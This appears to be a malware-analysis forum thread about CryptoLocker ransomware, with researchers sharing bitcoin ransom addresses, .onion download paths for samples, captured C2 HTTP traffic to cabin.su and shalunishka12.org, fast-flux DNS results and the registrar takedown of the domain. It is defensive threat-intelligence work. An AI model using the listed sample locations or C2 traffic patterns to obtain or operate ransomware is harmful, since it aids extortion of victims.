A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #22019  by Grinler
 Tue Jan 21, 2014 6:30 pm
tjcoder wrote: All reports say there have only been 3 since the oldest infections for Cryptolocker and that some researchers have been tracing through the public bitcoin data. I'm just one person and I can go to any of the public loggers and find where they cash out with 1-2 days correlation. If I was government I'd just subpoena or CA the data and know who they were. I doubt they are dumping into stolen accounts cause it only delays the tracing and adds massive overhead, plus they probably think bitcoin is really anonymous.

Even if they did generate per machine and then relayed through other wallets on the back-end, the data is still public and easily traceable even up to the current wallet holding the actual bitcoin. All reports seem to leave out what researchers find after they trace cash outs.. The C&C and propagation for this malware is entry-level; the RSA and AES and PPI do all the work..
They definitely do generate per machine. Very easy to do via the bitcoin api:

./bitcoind getnewaddress

The above command issued on the C2 server will create a new address that will then be used by the newly infected computer.

The original 2 BTC addresses were:

https://blockchain.info/address/18iEz61 ... 7XCGDf5SVb
https://blockchain.info/address/1KP72fB ... qM6iMRspCh

If there was a third, I am not aware of it, but would like to add it to my CryptoLocker page.

I agree, though, Bitcoin is not anonymous and they may have been able to see the trail just by analyzing the transactions in the original static addresses and where the money was sent to. Monitoring those wallets further down the trail would then enable the paper trail. The problem is when they go through bitcoin tumblers (1CbR8da9YPZqXJJKm9ze1GYf67eKAUfXwP), which make it difficult to continue tracing. I am still learning the bitcoin world and am sure that certain agencies have a far greater grasp on it than I do.
 #22029  by Xylitol
 Wed Jan 22, 2014 3:13 pm
Cryptolocker
Image Image
Code: Select all
olgleyhvcxfi6kdn.onion/1002.exe
olgleyhvcxfi6kdn.onion/1003.exe
https://www.virustotal.com/en/file/8cf5 ... 390404314/ > 3/50
https://www.virustotal.com/en/file/5291 ... 390404390/ > 4/50

Network activity:
Code: Select all
GET /I1QacGZADkNcZciF4niwN/Ki6AH9wkrs6syKWNrFRCaKBmKr3ZIhqEZIjEReQJUBladxcs8YtiYnGLqDGv3NpME3oIjGkCiVnllg3SG6LE8xbycrCbl+uSj7ADLs4n9lVzZIsbkXRumkNCrSgAvh/GOe3RtRqNVP5251++jnf+whyTTbUZPurQFnLCjb4kbdgljseGLryRtmSV98gjN9Uiw3pr3SHMMsWjeojPrCENej5e1LurAmJEmpFRBQFgMLxf4LmHLM74DaVTlQIZoyvuM/3gjLEHmAMhz9B3Ly6vEchu1/h11SC5N8TRQv5mM1XfUnkYhOXlyXVYwXIknEFQ== HTTP/1.1
Host: cabin.su

HTTP/1.1 200 OK
19f
<RSAKeyValue><Modulus>pi36n7v9TDwZgL8VnaVEkbxIil8USqxAzDmkNTPBXy/Rm2V+LLzQCvItoBa4akN3SOSPHU6q+Y2TXsxIDzyEIpnCax5PcosP3WAnVYwELdZFf8G60Zw2mMXbiOxvnOAtSEmfgHZWfafndjx/MIBm12fYXGdusksy9GtEAXP+VXm/eLr8yA+6DIwDAusaoGm/7kFQUDbaknFxsJaaqkPv6hQWHtJpt1FBNXnBukclxFxeBnAZ7AUVT9YRQhRhpu3iMwB6PF22WmOr7fRFh4JecVvAhkqSNwGh2mflatcYcl2UeMF8UN1UVz7A85T9Ghumpyzy+n000mIItDOBVyErfQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>
0

---

GET /wx5qE/21Y7qldH7PKwcujmlV9H3sZ80BS5xMr/vWJwYAx4OcKHEDfWE5Xdr+14xZVXBelALIlFMUU2PK2XueNskI/njUwjvfZtgCa/G12UA6TqHH5jrUv5MxCZiQgCcLthRTpWv4vzlCcjowQiUyL/e5+kNSu46T2ijGYRhqdz+jTSOWloRwsiqqfkC+ghSxc24e+uPX+68rOXbTnwfLpnQ7GLieXFfVkLQVo88uXuzHIAlSfuLdV+B7x6fsgc78kStBAxuv8uraaNHxz29eB/prv+ocYXHHLwtA0Gu+FSNVRVpI3RfajcYBVjpAaN3FlmEJongQVHRnWQxN7wZf9w== HTTP/1.1
Host: cabin.su

HTTP/1.1 200 OK
2f
431465+12pKs6JE8y4v29hCuEZNhXfgJucgoAuYtR+0.312
0
Code: Select all
• dns: 14 ›› ip: 134.249.36.177 - adress: CABIN.SU
-- addr: CABIN.SU -- ip: 91.190.179.50
-- addr: CABIN.SU -- ip: 92.248.152.248
-- addr: CABIN.SU -- ip: 194.28.61.91
-- addr: CABIN.SU -- ip: 109.104.185.78
-- addr: CABIN.SU -- ip: 185.33.143.175
-- addr: CABIN.SU -- ip: 31.135.60.153
-- addr: CABIN.SU -- ip: 46.150.66.35
-- addr: CABIN.SU -- ip: 188.235.218.206
-- addr: CABIN.SU -- ip: 31.192.62.247
-- addr: CABIN.SU -- ip: 109.162.27.67
-- addr: CABIN.SU -- ip: 178.137.181.98
-- addr: CABIN.SU -- ip: 188.190.207.152
-- addr: CABIN.SU -- ip: 46.0.139.8
-- addr: CABIN.SU -- ip: 134.249.36.177
Attachments
infected
(335.54 KiB) Downloaded 134 times
 #22036  by unixfreaxjp
 Wed Jan 22, 2014 8:18 pm
On the Xylit0l report of http://www.kernelmode.info/forum/viewto ... =90#p22029
I attached the PCAP I recorded for evidence.
Shared for helping other to research.
Image

Additionally, people should put more attention on the fast flux used, the moronz is riding on a botnet.
Thank's to Xylit0l for the info.

R01 (in Russia Fed) is responsible for releasing (read: abused) the infector domain, just use the below data for investigation, not the ARIN version:
http://www.r01.ru/domain/whois/check_we ... e=CABIN.SU
http://www.r01.ru/domain/whois/check-do ... n=CABIN.SU
Attachments
(14.62 KiB) Downloaded 108 times
Last edited by unixfreaxjp on Wed Jan 22, 2014 10:51 pm, edited 2 times in total.
 #22042  by tx707
 Thu Jan 23, 2014 2:34 pm
dej13 wrote:Does the original sample of CryptoLocker (in OP) still work/infect?
Reinfected my Virtual Machine and I can say it doesn't work. Still persistant in taskmanager but you can easily kill it with a .bat file.
 #22060  by unixfreaxjp
 Mon Jan 27, 2014 10:50 pm
In addition to post of: http://www.kernelmode.info/forum/viewto ... =90#p22036
Supporting report posted on: http://www.kernelmode.info/forum/viewto ... =90#p22029

CABIN.SU (CryptoLocker domain reported) is still on fast flux, see result on limited query below,
in my machine these bunch of 12 uniq IP addresses came up after 5 seconds:
Code: Select all
$ for i in 1 2 3 4 5; do dig +short cabin.su A; sleep 1; done
50.171.218.212
178.137.84.38
195.222.73.80
74.105.175.19
185.33.143.175
178.217.205.173
94.244.41.91
109.87.132.247
31.133.71.172
213.109.88.104
212.75.22.124
176.8.243.47
195.222.73.80
212.75.22.124
109.87.132.247
94.244.41.91
213.109.88.104
178.217.205.173
176.8.243.47
185.33.143.175
50.171.218.212
31.133.71.172
74.105.175.19
178.137.84.38
74.105.175.19
195.222.73.80
178.217.205.173
178.137.84.38
31.133.71.172
212.75.22.124
213.109.88.104
185.33.143.175
109.87.132.247
94.244.41.91
50.171.218.212
176.8.243.47
50.171.218.212
213.109.88.104
109.87.132.247
176.8.243.47
212.75.22.124
31.133.71.172
185.33.143.175
74.105.175.19
178.217.205.173
195.222.73.80
178.137.84.38
94.244.41.91
31.133.71.172
50.171.218.212
212.75.22.124
94.244.41.91
213.109.88.104
74.105.175.19
178.217.205.173
178.137.84.38
185.33.143.175
195.222.73.80
176.8.243.47
109.87.132.247
$
Just for the information, the IP sources:
Code: Select all
109.87.132.247|247.132.87.109.triolan.net.|13188 | 109.87.128.0/21 | BANKINFORM | UA | UKR.NET | TOV BANK-INFORM
176.8.243.47|176-8-243-47-chg.broadband.kyivstar.net.|15895 | 176.8.0.0/16 | KSNET | UA | KYIVSTAR.NET | KYIVSTAR PJSC
178.137.84.38|178-137-84-38-lvv.broadband.kyivstar.net.|15895 | 178.137.0.0/17 | KSNET | UA | KYIVSTAR.NET | KYIVSTAR PJSC
178.217.205.173||196767 | 178.217.205.0/24 | INMART1 | UA | INMART.NET.UA | INMART-INTERNET LTD
185.33.143.175|host175-143-33-185.lds.net.ua.|41709 | 185.33.140.0/22 | LDS | UA | LDS.NET.UA | LUGANSKY MEREZHY LTD
195.222.73.80|dynamic-vpdn-195-222-73-80.solo.by.|12358 | 195.222.64.0/20 | SOLO | BY | BELSONET.NET | SOLO LTD.
212.75.22.124|host-212-75-22-124.bbccable.net.|47982 | 212.75.0.0/19 | BBCCABLE | BG | BBCCABLE.NET | BBC CABLE LTD
213.109.88.104|s-213-109-88-104.under.net.ua.|41435 | 213.109.80.0/20 | UNDERNET | UA | UNDER.NET.UA | UNDERNET LTD.
31.133.71.172|pool-31-133-71-172.optima-east.net.|48882 | 31.133.64.0/20 | OPTIMA-SHID | UA | OPTIMA-EAST.NET | LLC OPTIMA-EAST
50.171.218.212|c-50-171-218-212.hsd1.mn.comcast.net.|7922 | 50.128.0.0/9 | COMCAST-7922 | US | COMCAST.NET | COMCAST CABLE COMMUNICATIONS HOLDINGS INC
74.105.175.19|pool-74-105-175-19.nwrknj.fios.verizon.net.|701 | 74.105.0.0/16 | UUNET | US | VERIZON.COM | VERIZON ONLINE LLC
94.244.41.91|ip-295b.proline.net.ua.|48278 | 94.244.0.0/18 | UKRDATACOM-NET | UA | RUSANOVKA-NET.KIEV.UA | UKRDATACOM LLC
As per seen above, mostly are from eastern Europe (Ukraine).
I worry for this case because these IP are used also for Kelihos botnet IPs, Noted: I am not suggesting ANY relation yet, it is too premature. Could be a shared zombies. But for the quick PoC, this sample was received from one of the IP above:
https://www.virustotal.com/en/file/7a5c ... /analysis/
is in the record in VT here:
https://www.virustotal.com/en/ip-addres ... formation/
is a Kelihos botnet trojan.

So let's get back to the usage of domain CABIN.SU ; The DNS query fluctuation of this domain can be a measure of infection hits for the reported CryptoLocker particularly.
I monitor it via Umbrella Labs (OpenDNS), and receiving activities, for example, in yesterday I saw strong query recorded below:
Image
The query like above still happened once in a while from the first time Xyli detected this.
IMHO this is an active threat still and in effort of infection/ransom, hardly to say that is massive, but it hits.

Dilemma has occurred. Since we're not just being here to sit and watch, the request for suspension to RU side was taken 5 days ago, you all should notice this too, but it looks like there is no suspension is executed. Below is evidence of suspension request followed:
Image
This is strange.. Any researchers or LE are on investigation / evidence collecting for CABIN.SU now that may causing pending on suspension? No?
Since this slow response is unlikely happen... Feed back please.
 #22067  by unixfreaxjp
 Tue Jan 28, 2014 3:53 pm
About cabin.su , info additional/updates:
We have repeatedly notified the registrar and waiting for response.
Registrar ignoring their CERT's request (above is the message from related CERT)
 #22086  by unixfreaxjp
 Thu Jan 30, 2014 7:28 am
Hi @Xylit0l, CABIN,SU is finally gone, *kapoots* *vanish* *history* *dead* < According to CERT-IB an hour ago.
Image
So the below is gonna be the last breath of this CL fast flux:
Code: Select all
$ @unixfreaxjp /malware]$ date
Thu Jan 30 16:28:22 JST 2014
$ for booboo in 1 2 3; do host -ta cabin.su; sleep 1;done
cabin.su has address 178.129.137.168
cabin.su has address 94.181.67.24
cabin.su has address 94.244.36.215
cabin.su has address 93.78.6.22
cabin.su has address 76.97.142.174
cabin.su has address 188.129.241.164
cabin.su has address 46.98.72.2
cabin.su has address 176.67.2.30
cabin.su has address 178.158.224.99
cabin.su has address 24.207.216.8
cabin.su has address 37.57.181.121
cabin.su has address 176.67.2.30
cabin.su has address 24.207.216.8
cabin.su has address 188.129.241.164
cabin.su has address 76.97.142.174
cabin.su has address 178.158.224.99
cabin.su has address 93.78.6.22
cabin.su has address 37.57.181.121
cabin.su has address 178.129.137.168
cabin.su has address 46.98.72.2
cabin.su has address 94.181.67.24
cabin.su has address 94.244.36.215
cabin.su has address 178.129.137.168
cabin.su has address 176.67.2.30
cabin.su has address 188.129.241.164
cabin.su has address 94.181.67.24
cabin.su has address 94.244.36.215
cabin.su has address 37.57.181.121
cabin.su has address 178.158.224.99
cabin.su has address 24.207.216.8
cabin.su has address 93.78.6.22
cabin.su has address 76.97.142.174
cabin.su has address 46.98.72.2
Don't rant to blame me for shutting down the nasty threat's internet domain for whatever reason, they don't deserve to be there.
IMHO: We're too sweet to let those extortioner extremists practicing CL too long.

#MalwareMustDie
 #22175  by Xylitol
 Mon Feb 10, 2014 2:41 pm
CryptoLocker
https://www.virustotal.com/en/file/62f1 ... 392041823/
Image
Code: Select all
POST /e.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:26.0) Gecko/20100101 Firefox/26.0
Host: shalunishka12.org

data=AWUwY2Q0MGZjZWY0Mjc2NzcABgAAxcBjwH66faJOAiGdqXPJ1moo2tUdB4nkai/STwSHgJmMSGVtoU3eHa9JJi5kV2Xg9FXcN9Fz/smwcyJCvqp8EAfCpcRlT/30mCYXMWSMvM/5xhc6Bad7lvH3uJL3hZawnE71oIAGi8eBF6OT3dS2DSmgNxTaGIqB7hUsmAjNaQfh5wM1fEs5qDpV9DLhKAvSn1chrM6ntU3r50wFL+TCTrKQX6sAgMpZ
gtiJtEcaOGNieFPReFpBZNvGxJqLEZxXee21Wnm0YZyorv2sbolJGAiM3ySqlDvPJUxXQCcRRMTDDY3obJlzU1ajSk06WMVCZwJhQ25lvhsknpDX9pu8RCUGJ3D8BkAiq8aW45SxjMbVQPUB8biCjXv+tYdEprwvV1UUPn5Ybt+T1A7JpHreaOybi9ythkQhlsa0HBzqBhw2G6zWrveplD+VilIeKrZJRdlABV8vwW7qnt1IftNfBTVTqjB0
8tLaO+ZqgzJWNPhsaW69RasQ5wMz2EfFU2IzDlVJ718hWZVfFNEd1TqRRxbwI0iWTwl3DxUOhkz35dP0O/iZ8N4OmfvYVuKtVj5Hhl47uyH5/3gfA29Nq0P/xcuRO3LH490AE7Q/5fmp6sx9Sze2E0UbvRVZs/I5cWyT8u3po0TJgIeFoUYFB43i831mBk1pOa8I2+BSM296ybW1Sa7Ukuj74XXeZ6VGx484W9INd+mhlOOptJuQn0bd894+
ZLJBbF0/SPTYq4QtytBLxXgblH1zYZX6pyET/tz79BAic+BGTenecgG5P/7f9IcRMfxXogqxLu2BgWg3I3V8vMd4/S6aGBTeF3wTFs94Y3NzpCbEEM1+lQPl8h52aGbug29Dmdw4B97tAvBXyqf804bKebBKHdhlU3SKCM7Xz2xl1d7fDcoYecWASP16NRrYjMookgKFTNB8aU54r3VyuEDne770WCGDXJ5bEkw3lQvjN0pPdsiWMhIG1XPH
Ni4ypQq3qJwrrdT/J1XJ0y1WXM7Z19d8BSQP/NK3J26BEHjPh/f/sgWbOZT8Lf8qKVxE55KXkhN3W15cSN0qty2XeFGvXvPlI40a3VAh38VEtPdze1qBNNUz7mJH13Qqfbe/CytJ/r1GHFrmizfxjyuJ6Ga/sToKDu0C5mbtI+CRgd1hzkv5y7Ofll72p+/DDGkil55Vlg9OiXknfAyQUXUskGOgAlcEvEs5LUmIuiEt8SkosXgwNsFe7N+g
4ZOGy4z2GfU0xldf5vXynwmoJoFoHRVPowJA9IQ6C/Nm1277wczieEszB2IYV4xKnUIA3RyLp1/q0fdKqkDP72kfH5DQJbfujhqAd4izJA7GEOwzRRxO8lPPm631MGZgG2gt2LhCOTJLCVA0rEFn88Gz07wZtgcNInxlnO0hOoiV4zNj
HTTP/1.1 200 OK
---
GET /e.php?id=e0cd40fcef427677 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:26.0) Gecko/20100101 Firefox/26.0
Host: shalunishka12.org

HTTP/1.1 200 OK
---
POST /e.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:26.0) Gecko/20100101 Firefox/26.0
Host: shalunishka12.org

data=AmUwY2Q0MGZjZWY0Mjc2Nzdqampqampqampqampqampqampqam==
HTTP/1.1 200 OK
Attachments
infected
(306.57 KiB) Downloaded 137 times
  • 1
  • 8
  • 9
  • 10
  • 11
  • 12